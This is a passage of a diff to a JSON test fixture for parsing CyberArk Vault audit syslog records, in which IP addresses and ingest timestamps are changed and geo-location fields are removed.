\u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e34.71.250.247\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "gateway_station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:31:54\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:31:54Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Use Password", "issuer": "Administrator", "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "success", "policy_id": "UnixSSH", @@ -958,9 +860,9 @@ "last_success_verification": "1615803764", "last_task": "VerifyTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Use Password", "timestamp": "Mar 15 03:31:54", "desc": "Use Password" @@ -971,8 +873,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:32.349060300Z", - "original": "\u003c5\u003e1 2021-03-15T10:31:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:31:54\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:31:54Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e34.71.250.247\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:31:54\",\"IsoTimestamp\":\"2021-03-15T10:31:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"34.71.250.247\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:52.374533800Z", + "original": "\u003c5\u003e1 2021-03-15T10:31:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:31:54\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:31:54Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:31:54\",\"IsoTimestamp\":\"2021-03-15T10:31:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"67.43.156.15\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "308", "kind": "event", "action": "use password", @@ -996,39 +898,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1044,7 +925,7 @@ }, "@timestamp": "2021-03-15T14:08:26.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" @@ -1055,17 +936,16 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T14:08:26Z", - "gateway_station": "34.71.250.247", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:08:26\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:08:26Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e34.71.250.247\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615814025\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "gateway_station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:08:26\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:08:26Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615814025\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Use Password", "issuer": "Administrator", "rfc5424": true, @@ -1073,7 +953,7 @@ "other": { "use_sudo_on_reconcile": "Yes" }, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -1086,9 +966,9 @@ "cpm_error_details": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", "last_fail_date": "1615814025" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Use Password", "timestamp": "Mar 15 07:08:26", "desc": "Use Password" @@ -1099,8 +979,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:32.349063500Z", - "original": "\u003c5\u003e1 2021-03-15T14:08:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:08:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:08:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e34.71.250.247\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814025\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:08:26\",\"IsoTimestamp\":\"2021-03-15T14:08:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"34.71.250.247\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814025\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", + "ingested": "2021-12-09T13:36:52.374538300Z", + "original": "\u003c5\u003e1 2021-03-15T14:08:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:08:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:08:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\\n 